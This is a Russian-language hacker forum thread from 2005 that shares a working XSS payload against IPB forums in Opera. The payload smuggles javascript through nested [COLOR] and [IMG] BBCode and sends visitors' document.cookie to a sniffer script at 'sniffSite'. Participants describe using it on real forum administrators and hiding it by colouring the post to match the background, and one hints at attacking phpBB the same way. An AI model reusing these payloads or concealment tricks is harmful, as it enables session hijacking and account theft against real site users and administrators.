Форумы XSS в форуме IPB, на примере браузера Опера

Fr13nd · 13 Jan 2005

Code:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR] 
послал админам в личку, потом был забанен....
потом доперло , что у админов опера,
так он и есть

отображение хсс в опере
Code:
'>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)
как сделать чтоб хотябы код не было видно ?

>>ElvI$<< · 13 Jan 2005

Внимательней читай коменты...

Егорыч++++

Совет. Поскольку, уязвимость не работает в других браузерах, то в Опере или Firefox видится всякая абракадабра. Этим можно выдать себя. Для того , чтоб себя не выдать можно покрасить сообщение под цвет фона.

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]

Примерно так...
Click to expand...

>>ElvI$<< · 13 Jan 2005

ой 8) не корректно отобразилось...

[COLOR=цвет фона][COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR][/COLOR]

Вот и все...я уже давно допер,как их скрыть!

Algol · 13 Jan 2005

Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки

>>ElvI$<< · 13 Jan 2005

да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)

Форумы XSS в форуме IPB, на примере браузера Опера

Fr13nd New Member

>>ElvI$<< Elder - Старейшина

>>ElvI$<< Elder - Старейшина

Algol New Member

>>ElvI$<< Elder - Старейшина

Useful Searches

Форумы XSS в форуме IPB, на примере браузера Опера

Fr13nd New Member

>>ElvI$<< Elder - Старейшина

>>ElvI$<< Elder - Старейшина

Algol New Member

>>ElvI$<< Elder - Старейшина